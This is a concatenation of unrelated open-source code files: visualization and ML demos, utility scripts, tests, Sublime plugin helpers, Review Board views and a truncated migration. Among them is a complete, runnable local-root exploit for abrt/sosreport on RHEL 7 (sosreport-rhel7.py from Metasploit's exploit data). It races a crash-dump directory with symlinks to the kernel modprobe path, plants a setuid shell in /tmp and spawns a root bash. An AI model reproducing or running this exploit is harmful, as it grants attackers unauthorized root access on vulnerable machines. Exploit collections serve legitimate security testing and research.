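# render an interactive scatterplot over those topic features.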
convention_df = st.SampleCorpora.ConventionData2012.get_data()
convention_df['parse'] = convention_df['text'].apply(st.whitespace_nlp_with_sentences)
unigram_corpus = (st.CorpusFromParsedDocuments(convention_df,
category_col='party',
parsed_col='parse')
.build().get_stoplisted_unigram_corpus())
topic_model = (st.SentencesForTopicModeling(unigram_corpus)
.get_topics_from_terms(['obama', 'romney', 'democrats', 'republicans',
'health', 'military', 'taxes', 'education',
'olympics', 'auto', 'iraq', 'iran', 'israel'],
scorer=RankDifference(), num_terms_per_topic=20))
topic_feature_builder = st.FeatsFromTopicModel(topic_model)
topic_corpus = st.CorpusFromParsedDocuments(
convention_df,
category_col='party',
parsed_col='parse',
feats_from_spacy_doc=topic_feature_builder
).build()
html = st.produce_scattertext_explorer(
topic_corpus,
category='democrat',
category_name='Democratic',
not_category_name='Republican',
width_in_pixels=1000,
metadata=convention_df['speaker'],
use_non_text_features=True,
use_full_doc=True,
pmi_threshold_coefficient=0,
topic_model_term_lists=topic_feature_builder.get_top_model_term_lists()
)
open('./demo_word_list_topic_model.html', 'wb').write(html.encode('utf-8'))
print('Open ./demo_word_list_topic_model.html in Chrome or Firefox.')
|
demo/one_shot/train.py | zhuguiqian/PaddleSlim | 926 | 12769885 |
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import argparse
import ast
import numpy as np
from PIL import Image
import os
import paddle
import paddle.fluid as fluid
from paddle.fluid.optimizer import AdamOptimizer
from paddle.fluid.dygraph.nn import Conv2D, Pool2D, Linear
from paddle.fluid.dygraph.base import to_variable
from paddleslim.nas.one_shot import SuperMnasnet
from paddleslim.nas.one_shot import OneShotSearch
def parse_args():
parser = argparse.ArgumentParser("Training for Mnist.")
parser.add_argument(
"--use_data_parallel",
type=ast.literal_eval,
default=False,
help="The flag indicating whether to use data parallel mode to train the model."
)
parser.add_argument("-e", "--epoch", default=5, type=int, help="set epoch")
parser.add_argument("--ce", action="store_true", help="run ce")
args = parser.parse_args()
return args
class SimpleImgConv(fluid.dygraph.Layer):
def __init__(self,
num_channels,
num_filters,
filter_size,
conv_stride=1,
conv_padding=0,
conv_dilation=1,
conv_groups=1,
act=None,
use_cudnn=False,
param_attr=None,
bias_attr=None):
super(SimpleImgConv, self).__init__()
self._conv2d = Conv2D(
num_channels=num_channels,
num_filters=num_filters,
filter_size=filter_size,
stride=conv_stride,
padding=conv_padding,
dilation=conv_dilation,
groups=conv_groups,
param_attr=None,
bias_attr=None,
act=act,
use_cudnn=use_cudnn)
def forward(self, inputs):
x = self._conv2d(inputs)
return x
class MNIST(fluid.dygraph.Layer):
def __init__(self):
super(MNIST, self).__init__()
self._simple_img_conv_pool_1 = SimpleImgConv(1, 20, 2, act="relu")
self.arch = SuperMnasnet(
name_scope="super_net", input_channels=20, out_channels=20)
self._simple_img_conv_pool_2 = SimpleImgConv(20, 50, 2, act="relu")
self.pool_2_shape = 50 * 13 * 13
SIZE = 10
scale = (2.0 / (self.pool_2_shape**2 * SIZE))**0.5
self._fc = Linear(
self.pool_2_shape,
10,
param_attr=fluid.param_attr.ParamAttr(
initializer=fluid.initializer.NormalInitializer(
loc=0.0, scale=scale)),
act="softmax")
def forward(self, inputs, label=None, tokens=None):
x = self._simple_img_conv_pool_1(inputs)
x = self.arch(x, tokens=tokens)  # super network (one-shot search space) stage
x = self._simple_img_conv_pool_2(x)
x = fluid.layers.reshape(x, shape=[-1, self.pool_2_shape])
x = self._fc(x)
if label is not None:
acc = fluid.layers.accuracy(input=x, label=label)
return x, acc
else:
return x
def test_mnist(model, tokens=None):
acc_set = []
avg_loss_set = []
batch_size = 64
test_reader = paddle.fluid.io.batch(
paddle.dataset.mnist.test(), batch_size=batch_size, drop_last=True)
for batch_id, data in enumerate(test_reader()):
dy_x_data = np.array([x[0].reshape(1, 28, 28)
for x in data]).astype('float32')
y_data = np.array(
[x[1] for x in data]).astype('int64').reshape(batch_size, 1)
img = to_variable(dy_x_data)
label = to_variable(y_data)
label.stop_gradient = True
prediction, acc = model.forward(img, label, tokens=tokens)
loss = fluid.layers.cross_entropy(input=prediction, label=label)
avg_loss = fluid.layers.mean(loss)
acc_set.append(float(acc.numpy()))
avg_loss_set.append(float(avg_loss.numpy()))
if batch_id % 100 == 0:
print("Test - batch_id: {}".format(batch_id))
# get test acc and loss
acc_val_mean = np.array(acc_set).mean()
avg_loss_val_mean = np.array(avg_loss_set).mean()
return acc_val_mean
def train_mnist(args, model, tokens=None):
epoch_num = args.epoch
BATCH_SIZE = 64
adam = AdamOptimizer(
learning_rate=0.001, parameter_list=model.parameters())
train_reader = paddle.fluid.io.batch(
paddle.dataset.mnist.train(), batch_size=BATCH_SIZE, drop_last=True)
if args.use_data_parallel:
train_reader = fluid.contrib.reader.distributed_batch_reader(
train_reader)
for epoch in range(epoch_num):
for batch_id, data in enumerate(train_reader()):
dy_x_data = np.array([x[0].reshape(1, 28, 28)
for x in data]).astype('float32')
y_data = np.array(
[x[1] for x in data]).astype('int64').reshape(-1, 1)
img = to_variable(dy_x_data)
label = to_variable(y_data)
label.stop_gradient = True
cost, acc = model.forward(img, label, tokens=tokens)
loss = fluid.layers.cross_entropy(cost, label)
avg_loss = fluid.layers.mean(loss)
if args.use_data_parallel:
avg_loss = model.scale_loss(avg_loss)
avg_loss.backward()
model.apply_collective_grads()
else:
avg_loss.backward()
adam.minimize(avg_loss)
# save checkpoint
model.clear_gradients()
if batch_id % 1 == 0:
print("Loss at epoch {} step {}: {:}".format(epoch, batch_id,
avg_loss.numpy()))
model.eval()
test_acc = test_mnist(model, tokens=tokens)
model.train()
print("Loss at epoch {} , acc is: {}".format(epoch, test_acc))
save_parameters = (not args.use_data_parallel) or (
args.use_data_parallel and
fluid.dygraph.parallel.Env().local_rank == 0)
if save_parameters:
fluid.save_dygraph(model.state_dict(), "save_temp")
print("checkpoint saved")
if __name__ == '__main__':
args = parse_args()
place = fluid.CPUPlace()
with fluid.dygraph.guard(place):
model = MNIST()
# step 1: training super net
#train_mnist(args, model)
# step 2: search
best_tokens = OneShotSearch(model, test_mnist)
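# OneShotSearch evaluates candidate token sequences (sub-network choices of the
# SuperMnasnet block) with test_mnist and returns the best-scoring tokens, which
# can then be passed as `tokens=` for the final training run below.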
# step 3: final training
# train_mnist(args, model, best_tokens)
|
scripts/cpsg.py | skyhoshi/concfg | 864 | 12769889 | """
cpsg.py
~~~~~~
Concfg Preset Screenshot Generator
Only works in a pure powershell/pwsh session; does not work in a terminal emulator like cmder.
Prerequisites:
Python3.4+, Pillow, jinja2, pywin32
"""
import os
import sys
import glob
import time
import shutil
import argparse
import win32gui
import subprocess
import win32process
from PIL import ImageGrab
from jinja2 import Template
LEGACY_PWSH = False
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
PRESETS_DIR = os.path.join(SCRIPT_DIR, os.pardir, 'presets')
PRESET_EXAMPLES_DIR = os.path.join(SCRIPT_DIR, os.pardir, 'preset_examples')
SKIP_LIST = ['basic', 'basic-reset']
def get_hwnds_for_pid(pid):
def callback(hwnd, hwnds):
if win32gui.IsWindowVisible(hwnd) and win32gui.IsWindowEnabled(hwnd):
_, found_pid = win32process.GetWindowThreadProcessId(hwnd)
if found_pid == pid:
hwnds.append(hwnd)
return True
hwnds = []
win32gui.EnumWindows(callback, hwnds)
return hwnds
def get_presets():
files = glob.glob(os.path.join(PRESETS_DIR, '*.json'))
presets = []
for item in files:
presets.append((os.path.splitext(os.path.basename(item))[0], item))
# preset pair list [(name, path), (name, path), ...]
return presets
def gens_for_preset(preset):
exe = 'powershell' if LEGACY_PWSH else 'pwsh'
print("Taking screenshot of preset '{0}'...".format(preset[0]))
# set color preset
pwsh = subprocess.Popen(
'{0} -noprofile -file {1}/setcolors.ps1 -preset {2}'.format(exe, SCRIPT_DIR, preset[1]),
creationflags=subprocess.CREATE_NEW_CONSOLE
)
# waiting for exit
time.sleep(4.0)
# print out color table then take screenshot
pwsh = subprocess.Popen(
'{0} -noprofile -noexit -file {1}/outcolors.ps1'.format(exe, SCRIPT_DIR),
creationflags=subprocess.CREATE_NEW_CONSOLE
)
# waiting for process
time.sleep(2.0)
for hwnd in get_hwnds_for_pid(pwsh.pid):
win32gui.SetForegroundWindow(hwnd)
bbox = win32gui.GetWindowRect(hwnd)
# remove window box shadow
crop_bbox = (bbox[0]+7, bbox[1], bbox[2]-7, bbox[3]-7)
img = ImageGrab.grab(crop_bbox)
if not os.path.exists(PRESET_EXAMPLES_DIR):
os.makedirs(PRESET_EXAMPLES_DIR)
img.save(os.path.join(PRESET_EXAMPLES_DIR, '{0}.png'.format(preset[0])))
pwsh.kill()
def img_dict(direntry):
return {
'name': direntry.name.replace('.png', ''),
'path': direntry.name
}
def is_img(direntry):
if direntry.is_file and direntry.name.endswith('.png'):
return True
return False
if __name__ == '__main__':
# Usage: python -m cpsg [args]
parser = argparse.ArgumentParser(
description='Concfg Preset Screenshot Generator')
parser.add_argument("-a", "--all",
help="generate screenshot for all presets",
action="store_true")
parser.add_argument("-l", "--legacy",
help="pass this option if you use Windows PowerShell",
action="store_true")
parser.add_argument("-p", "--preset",
help="generate screenshot for single preset")
parser.add_argument("-u", "--update",
help="also update the screenshot README",
action="store_true")
args = parser.parse_args()
if args.all or args.preset:
if not shutil.which('colortool.exe'):
print("Make sure you have 'ColorTool' installed.")
sys.exit(0)
input("NOTICE: Do not have other operations while the script runs, "
"or it will be interrupted when taking screenshots. "
"Hit Enter to continue: ")
presets = get_presets()
if args.legacy:
LEGACY_PWSH = True
if args.all:
for item in presets:
# skip non-color presets
if not item[0] in SKIP_LIST:
gens_for_preset(item)
elif args.preset:
# skip non-color presets
if not args.preset in SKIP_LIST:
match = [item for item in presets if item[0] == args.preset]
if len(match):
gens_for_preset(match[0])
else:
print("No preset named '{0}'.".format(args.preset))
sys.exit(0)
if args.update:
print('Updating screenshots README.md...')
# Get template
with open(os.path.join(SCRIPT_DIR, 'readme.jinja2')) as templateData:
template = Template(templateData.read())
# Get images
images = [img_dict(direntry) for direntry in os.scandir(PRESET_EXAMPLES_DIR) if is_img(direntry)]
images.sort(key=lambda x: x['name'])
# Generate README
with open(os.path.join(PRESET_EXAMPLES_DIR, 'README.md'), 'w') as readme:
readme.write(template.render(images=images))
else:
parser.print_help()
sys.exit(0)
|
egs/zeroth/s5/data/local/lm/buildLM/_scripts_/sumStatUniqWords.py | SYHPARK/kaldi | 330 | 12769942 |
#!/usr/bin/env python3
# Sum all the stats from uniqWord.JOB
# and build a unique-word dictionary with counts
#
# Copyright 2017 Atlas Guide (Author : <NAME>)
#
# Apache 2.0
#
import fileinput
import json
import sys
def main():
nLine = 1
word_dict = dict()
#f_out = open('json_words' ,'w')
word_count = 0
for line in fileinput.input():
# empty line
if not line.strip():
continue
if nLine % 1000 == 0:
print(" %d line processed"%nLine, end='\r', file=sys.stderr)
nLine += 1
tstrList = line.split()
if len(tstrList) < 2:
continue
wordList = tstrList[1:]
# after refining, the incoming field can contain multiple words
for curr_word in wordList:
curr_count = int(tstrList[0])
if curr_word not in word_dict:
if len(wordList) == 1:
word_dict[curr_word] = curr_count
else:
word_dict[curr_word] = 1
word_count += 1
else:
word_dict[curr_word] += curr_count
print(" REPORT: {} uniq. words are founded".format(word_count), file=sys.stderr)
print(" now sorting", file=sys.stderr)
sortedResult=sorted(word_dict.items(), key=lambda x:x[1], reverse=True)
#resultDict = {a[0]: a[1] for a in sortedResult}
#json_dump = json.dumps(resultDict, f_out, indent=4, ensure_ascii=False)
for item in sortedResult:
print(item[0], item[1])
if __name__ == '__main__':
main()
|
tests/source_image_caching_resolver_ut.py | jamieparkinson/loris | 150 | 12769958 |
import os
import shutil
import unittest
from tests.abstract_resolver import AbstractResolverTest
from loris import resolver
class SourceImageCachingResolverTest(AbstractResolverTest, unittest.TestCase):
def setUp(self):
super(SourceImageCachingResolverTest, self).setUp()
tests_dir = os.path.dirname(os.path.realpath(__file__))
self.cache_dir = os.path.join(tests_dir, 'cache')
config = {
'source_root': os.path.join(tests_dir, 'img'),
'cache_root': self.cache_dir
}
self.identifier = '01/02/0001.jp2'
self.expected_filepath = os.path.join(
self.cache_dir,
self.identifier
)
self.not_identifier = 'DOES_NOT_EXIST.jp2'
self.expected_format = 'jp2'
self.resolver = resolver.SourceImageCachingResolver(config)
def test_resolve(self):
super(SourceImageCachingResolverTest, self).test_resolve()
# Make sure the file exists in the cache
self.assertTrue(os.path.isfile(self.expected_filepath))
def tearDown(self):
# Clean Up the cache directory
if os.path.exists(self.cache_dir):
shutil.rmtree(self.cache_dir)
|
tests/api/single_load/test_optional_types.py | ssato/python-anyconfig | 213 | 12769959 | #
# Copyright (C) 2021 <NAME> <<EMAIL>>
# License: MIT
#
# pylint: disable=missing-docstring
import unittest
import anyconfig.api
from . import common
LOADER_TYPES = frozenset(anyconfig.api.list_types())
@unittest.skipIf('yaml' not in LOADER_TYPES,
'yaml loader is not available')
class YamlTestCase(common.TestCase):
kind = 'yaml'
pattern = '*.yml'
@unittest.skipIf('toml' not in LOADER_TYPES,
'toml loader is not available')
class TomlTestCase(YamlTestCase):
kind = 'toml'
pattern = '*.toml'
# vim:sw=4:ts=4:et:
|
floo/editor.py | barrasch/floobits-sublime | 124 | 12769988 | import sys
import os
try:
import sublime
except Exception:
pass
NEW_ACCOUNT_TXT = '''Welcome {username}!\n\nYou're all set to collaborate. You should check out our docs at https://{host}/help/plugins/sublime#usage.
You must run 'Floobits - Complete Sign Up' so you can log in to the website.'''
LINKED_ACCOUNT_TXT = '''Welcome {username}!\n\nYou are all set to collaborate.
You may want to check out our docs at https://{host}/help/plugins/sublime#usage'''
def name():
if sys.version_info < (3, 0):
py_version = 2
else:
py_version = 3
return 'Sublime Text %s' % py_version
def codename():
return 'sublime'
def ok_cancel_dialog(dialog):
return sublime.ok_cancel_dialog(dialog)
def error_message(msg):
sublime.error_message(msg)
def status_message(msg):
sublime.status_message(msg)
def platform():
return sublime.platform()
def set_timeout(f, timeout):
sublime.set_timeout(f, timeout)
def call_timeouts():
return
def message_dialog(msg):
sublime.message_dialog(msg)
def open_file(file):
win = sublime.active_window()
if win:
win.open_file(file)
def get_line_endings(path=None):
ending = sublime.load_settings('Preferences.sublime-settings').get('default_line_ending')
if ending == 'system':
return os.linesep
if ending == 'windows':
return '\r\n'
return '\n'
def select_auth(*args):
window, auths, cb = args
if not auths:
return cb(None)
auths = dict(auths)
for k, v in auths.items():
v['host'] = k
if len(auths) == 1:
return cb(list(auths.values())[0])
opts = [[h, 'Connect as %s' % a.get('username')] for h, a in auths.items()]
opts.append(['Cancel', ''])
def on_account(index):
if index < 0 or index >= len(auths):
# len(hosts) is cancel, appended to opts at end below
return cb(None)
host = opts[index][0]
return cb(auths[host])
flags = 0
if hasattr(sublime, 'KEEP_OPEN_ON_FOCUS_LOST'):
flags |= sublime.KEEP_OPEN_ON_FOCUS_LOST
return window.show_quick_panel(opts, on_account, flags)
|
reviewboard/accounts/views.py | amalik2/reviewboard | 921 | 12770007 | from __future__ import unicode_literals
import logging
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.forms.forms import ErrorDict
from django.http import HttpResponseRedirect
from django.shortcuts import get_object_or_404
from django.utils import six
from django.utils.decorators import method_decorator
from django.utils.functional import cached_property
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.csrf import csrf_protect
from django.views.generic.base import TemplateView
from djblets.auth.views import register
from djblets.configforms.views import ConfigPagesView
from djblets.features.decorators import feature_required
from djblets.forms.fieldsets import filter_fieldsets
from djblets.siteconfig.models import SiteConfiguration
from djblets.util.compat.django.shortcuts import render
from djblets.util.decorators import augment_method_from
from djblets.views.generic.etag import ETagViewMixin
from reviewboard.accounts.backends import get_enabled_auth_backends
from reviewboard.accounts.forms.registration import RegistrationForm
from reviewboard.accounts.mixins import CheckLoginRequiredViewMixin
from reviewboard.accounts.models import Profile
from reviewboard.accounts.pages import AccountPage, OAuth2Page, PrivacyPage
from reviewboard.accounts.privacy import is_consent_missing
from reviewboard.admin.decorators import check_read_only
from reviewboard.avatars import avatar_services
from reviewboard.notifications.email.decorators import preview_email
from reviewboard.notifications.email.message import \
prepare_password_changed_mail
from reviewboard.oauth.features import oauth2_service_feature
from reviewboard.oauth.forms import (UserApplicationChangeForm,
UserApplicationCreationForm)
from reviewboard.oauth.models import Application
from reviewboard.site.mixins import CheckLocalSiteAccessViewMixin
from reviewboard.site.urlresolvers import local_site_reverse
class UserInfoboxView(CheckLoginRequiredViewMixin,
CheckLocalSiteAccessViewMixin,
ETagViewMixin,
TemplateView):
"""Displays information on a user, for use in user pop-up infoboxes.
This is meant to be embedded in other pages, rather than being
a standalone page.
"""
template_name = 'accounts/user_infobox.html'
def __init__(self, **kwargs):
"""Initialize a view for the request.
Args:
**kwargs (dict):
Keyword arguments passed to :py:meth:`as_view`.
"""
super(UserInfoboxView, self).__init__(**kwargs)
self._lookup_user = None
self._show_profile = None
self._timezone = None
def get_etag_data(self, request, username, *args, **kwargs):
"""Return an ETag for the view.
This will look up some state needed for the request and generate a
suitable ETag.
Args:
request (django.http.HttpRequest):
The HTTP request from the client.
username (unicode):
The username of the user being looked up.
*args (tuple):
Positional arguments to pass to the handler.
**kwargs (tuple):
Keyword arguments to pass to the handler.
These will be arguments provided by the URL pattern.
Returns:
unicode:
The ETag for the page.
"""
from reviewboard.extensions.hooks import UserInfoboxHook
user = get_object_or_404(User, username=username)
self._lookup_user = user
profile = user.get_profile()
self._show_profile = user.is_profile_visible(request.user)
self._timezone = profile.timezone
etag_data = [
user.first_name,
user.last_name,
user.email,
six.text_type(user.last_login),
six.text_type(settings.TEMPLATE_SERIAL),
six.text_type(self._show_profile),
self._timezone,
]
if avatar_services.avatars_enabled:
avatar_service = avatar_services.for_user(user)
if avatar_service:
etag_data.extend(avatar_service.get_etag_data(user))
local_site = self.local_site
for hook in UserInfoboxHook.hooks:
try:
etag_data.append(hook.get_etag_data(
user=user,
request=request,
local_site=local_site))
except Exception as e:
logging.exception('Error when running UserInfoboxHook.'
'get_etag_data method in extension "%s": %s',
hook.extension.id, e)
return ':'.join(etag_data)
def get_context_data(self, **kwargs):
"""Return data for the template.
This will return information on the user, along with information from
any extension hooks used for the page.
Args:
**kwargs (tuple):
Additional keyword arguments from the URL pattern.
Returns:
dict:
Context data for the template.
"""
from reviewboard.extensions.hooks import UserInfoboxHook
# These are accessed several times, so bring them in to reduce
# attribute lookups.
user = self._lookup_user
username = user.username
local_site = self.local_site
extra_content = []
for hook in UserInfoboxHook.hooks:
try:
extra_content.append(hook.render(
user=user,
request=self.request,
local_site=local_site))
except Exception as e:
logging.exception('Error when running UserInfoboxHook.'
'render method in extension "%s": %s',
hook.extension.id, e)
review_requests_url = local_site_reverse('user', local_site=local_site,
args=[username])
reviews_url = local_site_reverse('user-grid', local_site=local_site,
args=[username, 'reviews'])
has_avatar = (
avatar_services.avatars_enabled and
avatar_services.for_user(user) is not None
)
return {
'extra_content': mark_safe(''.join(extra_content)),
'full_name': user.get_full_name(),
'has_avatar': has_avatar,
'infobox_user': user,
'review_requests_url': review_requests_url,
'reviews_url': reviews_url,
'show_profile': self._show_profile,
'timezone': self._timezone,
}
@csrf_protect
def account_register(request, next_url='dashboard'):
"""Display the appropriate registration page.
If registration is enabled and the selected authentication backend supports
creation of users, this will return the appropriate registration page. If
registration is not supported, this will redirect to the login view.
"""
siteconfig = SiteConfiguration.objects.get_current()
auth_backends = get_enabled_auth_backends()
if (auth_backends[0].supports_registration and
siteconfig.get('auth_enable_registration') and
not siteconfig.get('site_read_only')):
response = register(request, next_page=reverse(next_url),
form_class=RegistrationForm)
return response
return HttpResponseRedirect(reverse("login"))
class MyAccountView(ConfigPagesView):
"""Displays the My Account page containing user preferences.
The page will be built based on registered pages and forms. This makes
it easy to plug in new bits of UI for the page, which is handy for
extensions that want to offer customization for users.
"""
title = _('My Account')
css_bundle_names = [
'account-page',
]
js_bundle_names = [
'3rdparty-jsonlint',
'config-forms',
'account-page',
]
@method_decorator(login_required)
@method_decorator(check_read_only)
@augment_method_from(ConfigPagesView)
def dispatch(self, *args, **kwargs):
"""Handle the view.
This just falls back to the djblets ConfigPagesView.dispatch
implementation.
"""
pass
@property
def nav_title(self):
"""Get the title for the navigation section."""
return self.request.user.username
@property
def page_classes(self):
"""The list of page classes for this view.
If the user is missing any consent requirements or has not accepted
the privacy policy/terms of service, only the privacy page will be
shown.
"""
if self.is_user_missing_consent:
return [AccountPage.registry.get('page_id', PrivacyPage.page_id)]
return list(AccountPage.registry)
@cached_property
def ordered_user_local_sites(self):
"""Get the user's local sites, ordered by name."""
return self.request.user.local_site.order_by('name')
@property
def render_sidebar(self):
"""Whether or not to render the sidebar.
If the user is missing any consent requirements or has not accepted
the privacy policy/terms of service, the sidebar will not render.
This is to prevent the user from navigating away from the privacy page
before making decisions.
"""
return not self.is_user_missing_consent
@cached_property
def is_user_missing_consent(self):
"""Whether or not the user is missing consent."""
return is_consent_missing(self.request.user)
@login_required
@preview_email(prepare_password_changed_mail)
def preview_password_changed_email(request):
return {
'user': request.user,
}
@login_required
@feature_required(oauth2_service_feature)
def edit_oauth_app(request, app_id=None):
"""Create or edit an OAuth2 application.
Args:
request (django.http.HttpRequest):
The current HTTP request.
app_id (int, optional):
The ID of the application to edit.
If this argument is ``None``, a new application will be created.
Returns:
django.http.HttpResponse:
The rendered view.
"""
# If we import this at global scope, it will cause issues with admin sites
# being automatically registered.
from reviewboard.oauth.admin import ApplicationAdmin
if app_id:
app = get_object_or_404(
Application,
pk=app_id,
user=request.user,
)
form_cls = UserApplicationChangeForm
fieldsets = ApplicationAdmin.fieldsets
else:
app = None
form_cls = UserApplicationCreationForm
fieldsets = ApplicationAdmin.add_fieldsets
if request.method == 'POST':
form_data = request.POST.copy()
form = form_cls(user=request.user, data=form_data, initial=None,
instance=app)
if form.is_valid():
app = form.save()
if app_id is not None:
next_url = OAuth2Page.get_absolute_url()
else:
next_url = reverse('edit-oauth-app', args=(app.pk,))
return HttpResponseRedirect(next_url)
else:
form = form_cls(user=request.user, data=None, initial=None,
instance=app)
# Show a warning at the top of the form when the form is disabled for
# security.
#
# We don't need to worry about full_clean not being called (which would
# be if we went through form.errors) because this form will never be
# saved.
if app and app.is_disabled_for_security:
form._errors = ErrorDict({
'__all__': form.error_class(
[form.DISABLED_FOR_SECURITY_ERROR],
),
})
return render(
request=request,
template_name='accounts/edit_oauth_app.html',
context={
'app': app,
'form': form,
'fieldsets': filter_fieldsets(form=form_cls,
fieldsets=fieldsets),
'oauth2_page_url': OAuth2Page.get_absolute_url(),
'request': request,
})
|
test/test_image_streamer_deployment_group_facts.py | nabhajit-ray/oneview-ansible | 108 | 12770009 | <reponame>nabhajit-ray/oneview-ansible
#!/usr/bin/python
# -*- coding: utf-8 -*-
###
# Copyright (2016-2017) Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
import pytest
from hpe_test_utils import ImageStreamerBaseFactsTest
from oneview_module_loader import DeploymentGroupFactsModule
@pytest.mark.resource(TestDeploymentGroupFactsModule='deployment_groups')
class TestDeploymentGroupFactsModule(ImageStreamerBaseFactsTest):
"""
ImageStreamerBaseFactsTest has common tests for the parameters support.
"""
DEPLOYMENT_GROUP = dict(
name="OSS",
uri="/rest/deployment-group/d1c7b09a-6c7b-4ae0-b68e-ed208ccde1b0")
def test_get_all_deployment_groups(self):
self.resource.get_all.return_value = [self.DEPLOYMENT_GROUP]
self.mock_ansible_module.params = self.EXAMPLES[0]['image_streamer_deployment_group_facts']
DeploymentGroupFactsModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(deployment_groups=[self.DEPLOYMENT_GROUP])
)
def test_get_a_deployment_group_by_name(self):
self.resource.get_by.return_value = [self.DEPLOYMENT_GROUP]
self.mock_ansible_module.params = self.EXAMPLES[4]['image_streamer_deployment_group_facts']
DeploymentGroupFactsModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(deployment_groups=[self.DEPLOYMENT_GROUP])
)
if __name__ == '__main__':
pytest.main([__file__])
|
Lib/test/bugs/pr183.py | jimmyyu2004/jython | 332 | 12770013 | <gh_stars>100-1000
# Test case for PR#183; print of a recursive PyStringMap causes a JVM stack
# overflow.
g = globals()
print(g)
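# The globals dict is recursive because the assignment above binds the name 'g'
# inside globals() itself, so the dict ends up containing a reference to itself.
# A minimal self-contained illustration of the same effect:
#   d = {}
#   d['self'] = d
#   print(d)   # CPython's repr detects the cycle and prints {'self': {...}}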
|
data/exploits/cve-2015-5287/sosreport-rhel7.py | OsmanDere/metasploit-framework | 26,932 | 12770015 | <reponame>OsmanDere/metasploit-framework<filename>data/exploits/cve-2015-5287/sosreport-rhel7.py
#!/usr/bin/python
# CVE-2015-5287 (?)
# abrt/sosreport RHEL 7.0/7.1 local root
# rebel 09/2015
# [user@localhost ~]$ python sosreport-rhel7.py
# crashing pid 19143
# waiting for dump directory
# dump directory: /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
# waiting for sosreport directory
# sosreport: sosreport-localhost.localdomain-20151130194114
# waiting for tmpfiles
# tmpfiles: ['tmpurfpyY', 'tmpYnCfnQ']
# moving directory
# moving tmpfiles
# tmpurfpyY -> tmpurfpyY.old
# tmpYnCfnQ -> tmpYnCfnQ.old
# waiting for sosreport to finish (can take several minutes)........................................done
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# bash-4.2# cat /etc/redhat-release
# Red Hat Enterprise Linux Server release 7.1 (Maipo)
import os,sys,glob,time,sys,socket
payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"
pid = os.fork()
if pid == 0:
os.execl("/usr/bin/sleep","sleep","100")
time.sleep(0.5)
print "crashing pid %d" % pid
os.kill(pid,11)
print "waiting for dump directory"
def waitpath(p):
while 1:
r = glob.glob(p)
if len(r) > 0:
return r
time.sleep(0.05)
dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]
print "dump directory: ", dumpdir
os.chdir(dumpdir)
print "waiting for sosreport directory"
sosreport = waitpath("sosreport-*")[0]
print "sosreport: ", sosreport
print "waiting for tmpfiles"
tmpfiles = waitpath("tmp*")
print "tmpfiles: ", tmpfiles
print "moving directory"
os.rename(sosreport, sosreport + ".old")
os.mkdir(sosreport)
os.chmod(sosreport,0777)
os.mkdir(sosreport + "/sos_logs")
os.chmod(sosreport + "/sos_logs",0777)
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log")
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log")
print "moving tmpfiles"
for x in tmpfiles:
print "%s -> %s" % (x,x + ".old")
os.rename(x, x + ".old")
open(x, "w+").write("/tmp/hax.sh\n")
os.chmod(x,0666)
os.chdir("/")
sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")
def trigger():
open("/tmp/hax.sh","w+").write(payload)
os.chmod("/tmp/hax.sh",0755)
try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
except: pass
time.sleep(0.5)
try:
os.stat("/tmp/sh")
except:
print "could not create suid"
sys.exit(-1)
print "success"
os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
sys.exit(-1)
for x in xrange(0,60*10):
if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():
print "done"
trigger()
time.sleep(1)
sys.stderr.write(".")
print "timed out" |
src/obfuscapk/obfuscators/new_signature/__init__.py | Elyorbe/Obfuscapk | 688 | 12770040 | <reponame>Elyorbe/Obfuscapk
#!/usr/bin/env python3
from .new_signature import NewSignature
|
src/genie/libs/parser/iosxe/tests/ShowPlatformSoftwareFedactiveFnfEtAnalyticsFlows/cli/equal/golden_output_expected.py | balmasea/genieparser | 204 | 12770041 | <reponame>balmasea/genieparser<filename>src/genie/libs/parser/iosxe/tests/ShowPlatformSoftwareFedactiveFnfEtAnalyticsFlows/cli/equal/golden_output_expected.py
expected_output = {'current-eta-records': 0,
'excess-packets-received': 60,
'excess-syn-received': 0,
'total-eta-fnf': 2,
'total-eta-idp': 2,
'total-eta-records': 4,
'total-eta-splt': 2,
'total-packets-out-of-order': 0,
'total-packets-received': 80,
'total-packets-retransmitted': 0}
|
iepy/webui/corpus/migrations/0014_data_migration_move_metadata.py | francolq/iepy | 813 | 12770092 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import logging
from django.db import models, migrations
logging.basicConfig(format="%(asctime)-15s %(message)s")
logger = logging.getLogger(__file__)
logger.setLevel(logging.INFO)
BULK_SIZE = 2500
def move_metadata(apps, schema_editor):
IEDocument = apps.get_model('corpus', 'IEDocument')
